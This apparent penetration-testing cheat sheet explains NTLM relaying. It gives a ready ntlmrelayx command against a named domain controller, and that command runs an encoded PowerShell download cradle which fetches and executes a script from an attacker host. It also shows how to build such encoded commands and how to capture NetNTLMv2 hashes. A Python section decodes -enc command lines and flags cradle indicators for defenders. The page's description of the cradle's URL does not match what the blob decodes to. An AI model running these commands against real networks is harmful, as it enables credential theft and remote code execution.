NTLM Relaying

Intercept or capture authentication traffic and replay it to impersonate the client against the same or a different service.

Net-NTLM relaying against SMB is only possible if SMB signing is not enabled on the target.

Start ntlmrelayx listener

sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA4AC4AOQA6ADgAMQAvAHIAdQBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA=='

192.168.120.6 is the IP address of dc-2.dev.cyberbotic.io (target).

The encoded command is a download cradle for "http://192.168.119.120/run.txt"; /run.txt is a PowerShell runner -> PowerShell Runners.

Create the encoded command

Using pwsh on Kali:

sudo apt -y install powershell
pwsh
# Plain-text command to encode
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.txt') | IEX"
# -EncodedCommand expects base64 of the UTF-16LE (Unicode) bytes, not UTF-8
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
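From the defender's side, the same UTF-16LE/base64 transform is what you reverse when an -enc command line shows up in process-creation logs. The following is an added Python example, not code from the original page: it mirrors the pwsh encoding above, decodes the blob from the relay command, and flags download-cradle markers. The sample command line and the indicator list are constructed for illustration.

```python
import base64
import re

# Blob from the ntlmrelayx command above (extraction line-wrap spaces removed).
PAGE_BLOB = ("KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA4AC4AOQA6ADgAMQAvAHIAdQBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA==")

# "-e", "-enc", "-EncodedCommand" ... followed by a base64 token (optionally quoted).
# The flag is validated in code so "-ExecutionPolicy bypass" is not mistaken for one.
_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+[\"']?([A-Za-z0-9+/=]+)")

# Constructed list of markers for the download-and-execute cradle shown on this page.
CRADLE_INDICATORS = ("downloadstring", "downloadfile", "webclient",
                     "invoke-webrequest", "invoke-expression", "iex")


def encode_command(text: str) -> str:
    """Same transform as the pwsh snippet above: UTF-16LE bytes, then base64."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command; whitespace from log line wrapping is dropped."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    return raw.decode("utf-16-le")


def extract_encoded_command(cmdline: str):
    """Return the decoded script from a process command line, or None."""
    for m in _FLAG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return decode_command(m.group(2))
            except (ValueError, UnicodeDecodeError):
                continue  # token was not a valid UTF-16LE/base64 blob
    return None


def cradle_indicators(script: str):
    """Cradle markers present in a decoded script (case-insensitive)."""
    low = script.lower()
    return [i for i in CRADLE_INDICATORS if i in low]


if __name__ == "__main__":
    # Constructed process-creation command line, as it might appear in Sysmon/4688 logs.
    sample = "powershell.exe -nop -w hidden -ExecutionPolicy bypass -enc " + PAGE_BLOB
    script = extract_encoded_command(sample)
    print(script)
    print("cradle indicators:", cradle_indicators(script))
```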

Grab NetNTLMv2

To make ntlmrelayx write the captured NetNTLMv2 hashes to a file, add the following flag:

--output-file testrelay.txt

Keep in mind that NetNTLMv2 hashes cannot be used for pass-the-hash; they can only be relayed or cracked offline.

Forcing NTLM auth

  • Windows Shortcut

Tooling
